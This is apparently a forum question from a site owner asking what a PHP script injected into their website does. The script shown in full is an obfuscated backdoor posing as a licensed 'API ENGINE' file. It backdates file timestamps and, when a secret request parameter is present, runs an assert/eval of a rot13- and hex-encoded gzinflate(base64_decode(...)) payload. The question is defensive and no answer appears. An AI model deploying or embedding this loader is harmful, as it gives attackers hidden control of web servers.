# What is This Script Trying to do

Tags: php

This Script seems to have been added into my Site Code

I want to understand what is it trying to do so I can try to prevent it .

```
  <?php
/* =====================================================
 Copyright (c) 2004,2015 SoftNews Media Group

 API ENGINE
=====================================================
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright © 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.
*/

$files = scandir($_SERVER['DOCUMENT_ROOT']);
for ($i=0;$i<count($files);$i++) { if(stristr($files[$i], 'php')) {$time = filemtime($_SERVER['DOCUMENT_ROOT']."/".$files[$i]);break; }}touch(dirname(__FILE__), $time);touch($_SERVER['SCRIPT_FILENAME'], $time);  $nother = '865379d57aff1c682f7d6d1d410f69ed'; if (isset($_REQUEST['59407b9c'])) { $fun = 'ass';$fun .= 'ert';@$fun(str_rot13('riny("\k65\k76\k61\k6P\k28\k67\k7N\k69\k6R\k66\k6P\k61\k74\k65\k28\k62\k61\k73\k65\k36\k34\k5S\k64\k65\k63\k6S\k64\k65\k28\'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